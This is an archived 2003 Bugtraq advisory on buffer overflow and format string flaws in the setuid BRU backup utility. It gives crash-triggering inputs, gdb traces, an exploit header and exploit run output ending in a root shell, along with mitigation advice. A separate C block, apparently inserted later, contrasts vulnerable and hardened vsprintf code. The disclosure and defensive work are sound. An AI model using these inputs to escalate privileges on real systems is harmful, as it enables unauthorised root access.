107901 2003-07-17  19:30  /2 lines/ KF <dotslash@snosoft.com>
Imported: 2003-07-17  19:30  by Brevbäraren
External recipient: bugtraq <bugtraq@securityfocus.com>
Recipient: Bugtraq (import) <5622>
Subject: SRT2003-07-16-0358 - bru has buffer overflow and format issues
------------------------------------------------------------

(107901) /KF <dotslash@snosoft.com>/----------------
Attachment (text/plain) in text 107902
107902 2003-07-17  19:30  /150 lines/ KF <dotslash@snosoft.com>
Attachment filename: "SRT2003-07-16-0358.txt"
Imported: 2003-07-17  19:30  by Brevbäraren
External recipient: bugtraq <bugtraq@securityfocus.com>
Recipient: Bugtraq (import) <5623>
Attachment (text/plain) to text 107901
Subject: Attachment (SRT2003-07-16-0358.txt) to: SRT2003-07-16-0358 - bru has buffer overflow and format issues
------------------------------------------------------------
Secure Network Operations, Inc.           http://www.secnetops.com
Anvil IDS appliance                http://www.secnetops.com/products
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion
Detection Systems (IDS), Software Security Validation, and
Corporate/Private Network Security. Our mission is to facilitate a
secure and reliable Internet and inter-enterprise communications
infrastructure through the products and services we offer.


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-16-0358
Product                 : Backup and Restore Utility for Unix (BRU)
Version                 : <= 17.0
Vendor                  : http://www.tolisgroup.com (purchased EST code)
Class                   : local
Criticality             : Medium to Low
Operating System(s)     : *nix


High Level Explanation
************************************************************************
High Level Description  : bru has buffer overflow and format issues
What to do              : upgrade to the Tolisgroup BRU or chmod -s bru


Technical Details
************************************************************************
Proof Of Concept Status : SNO has exploits for the described situation
Low Level Description   :

EST BRU(TM) Backup and Restore Utility is the No. 1 award winning
product for Linux backup, having won more awards and maintained a
larger installed base than any other commercial Linux backup
solution. A respected industry veteran, EST has been developing UNIX
backup products since 1985.

Enhanced Software Technologies Inc., the previous vendor of BRU, has
sold its product to the current vendor, The Tolisgroup.

As described by The Tolisgroup, BRU is backup science at its best. By
exacting design, BRU solutions never abort the restore and recover the
most data of any backup solution.

In the past there have been a few issues with BRU reported to the
public. One such issue (BRUEXECLOG) prompted the vendor to remove the
suid bit from BRU. The current Tolisgroup version of BRU does not ship
with the suid bit set by default; however, we feel it is possible that
users could read old suggestions on newsgroups or the web and run
chmod +s bru. The Tolisgroup has never shipped BRU with the suid bit
set. In the past BRU would prompt regular users to set the suid bit on
BRU; however, I cannot confirm that the Tolisgroup version has ever
had this behavior.

elguapo@gentoo elguapo $ bru
bru: [W171] warning - BRU must be owned by root and have suid bit set

By default BRU-15.1-3.i386.rpm has the suid bit set;
BRU2000-15.0P-1.i386.rpm does not. Both versions will prompt
a user to set the bit if it does not already exist.

The issues described below DO affect the Tolisgroup version; however,
if the user has not set the suid bit there is no problem. The
Tolisgroup has stated it will take measures to ensure that in the
future BRU does not contain the potential to be exploited.

The two issues at hand can be reproduced as follows:

elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)

elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)

Both issues appear to be caused by poor usage of vsprintf().

Starting program: /bin/bru %n%n%n%n%n
Program received signal SIGSEGV, Segmentation fault.
0x40071d96 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x40071d96 in vfprintf () from /lib/libc.so.6
#1  0x0805543a in step ()

Starting program: /bin/bru `perl -e 'print "A" x 3025'`
Program received signal SIGSEGV, Segmentation fault.
0x08060027 in step ()
(gdb) bt
#0  0x08060027 in step ()
Cannot access memory at address 0x41414141
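To show the bug class behind both traces above, here is an added example (written for this write-up, not BRU's code, which is closed source): a hypothetical varargs warning routine in its vulnerable shape, where the caller's string is the format and vsprintf() has no bound, next to the bounded form with a compiler check that flags non-literal formats. The buffer size and sentinel value are constructed for the demonstration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_MAX 64            /* small fixed buffer standing in for BRU's own */
#define SENTINEL 0xDEADBEEFu  /* marker word placed right after the buffer */
struct msgbuf { char data[MSG_MAX]; unsigned int sentinel; };
#ifdef __GNUC__
#define PRINTF_LIKE(f, a) __attribute__((format(printf, f, a)))
#else
#define PRINTF_LIKE(f, a)
#endif

/* Vulnerable pattern (a reconstruction of the bug class, not BRU's code): the
 * caller's string is the format and vsprintf() has no bound, so 3050 "A"s run
 * past data[] and "%n" makes vfprintf() write through stack values. Not called. */
void warn_unbounded(struct msgbuf *m, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsprintf(m->data, fmt, ap);
    va_end(ap);
}

/* Hardened form: vsnprintf() bounded by the buffer size, and the format
 * attribute makes gcc/clang -Wformat-security flag any caller that passes a
 * non-literal format. Returns 0 if the message fit, 1 if it was truncated. */
PRINTF_LIKE(2, 3)
int warn_bounded(struct msgbuf *m, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(m->data, sizeof m->data, fmt, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= sizeof m->data) ? 1 : 0;
}

/* Runs the advisory's two inputs through the bounded path: "%n%n%n%n" must
 * arrive as plain text, and 3050 "A"s must be truncated with the sentinel
 * intact. Returns 1 when both hold. */
int check_bounded_path(void)
{
    struct msgbuf m = { "", SENTINEL };
    char big[3051];
    memset(big, 'A', 3050);
    big[3050] = '\0';
    if (warn_bounded(&m, "%s", "%n%n%n%n") != 0 || strcmp(m.data, "%n%n%n%n") != 0) return 0;
    if (warn_bounded(&m, "%s", big) != 1 || m.sentinel != SENTINEL) return 0;
    return strlen(m.data) == (size_t)(MSG_MAX - 1);
}
```

Compiling with -Wformat-security reports any call site that hands warn_bounded() a variable as its format, which is the review check that catches the first of the two bugs before it ships.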

These issues can easily be exploited by an attacker to gain root
access.

elguapo@gentoo tmp $ head ./0x82-BRU_overformat.c
/*
**
** backup and restore utility (BRU) local root exploit.
** Target package: BRU-15.1-3.i386.rpm
**
** bug found by "Kevin Finisterre"(KF), <dotslash@snosoft.com>.
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

elguapo@gentoo tmp $ cc -o 0x82-BRU_overformat 0x82-BRU_overformat.c
elguapo@gentoo tmp $ ./0x82-BRU_overformat 1

0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
                Target package: BRU-15.1-3.i386.rpm

[*] shellcode: 0xbfffff9e
[*] It's my message:
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFK...
KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFthanks!!ÿÿ¿
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)

elguapo@gentoo tmp $ ./0x82-BRU_overformat 2

0x82-BRU_overformat - backup and restore utility (BRU) local root exploit.
                Target package: BRU-15.1-3.i386.rpm

[*] shellcode: 0xbfffff9e, $-flag: 70, pad: 0
x82: [E155] error - memory fault (SIGSEGV)
...
[*] shellcode: 0xbfffff9e, $-flag: 73, pad: 2
x82: [E001] specify mode (-cdeghitx)
sh-2.05b# id
uid=0(root) gid=0(root) groups=100(users),10(wheel)

Patch or Workaround     : chmod -s /path/to/bru, or purchase BRU from
The Tolisgroup.

Vendor Status           : Original vendor no longer exists. The
Tolisgroup BRU is not vulnerable by default, please upgrade.

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.
(107902) /KF <dotslash@snosoft.com>/------(Re-wrapped)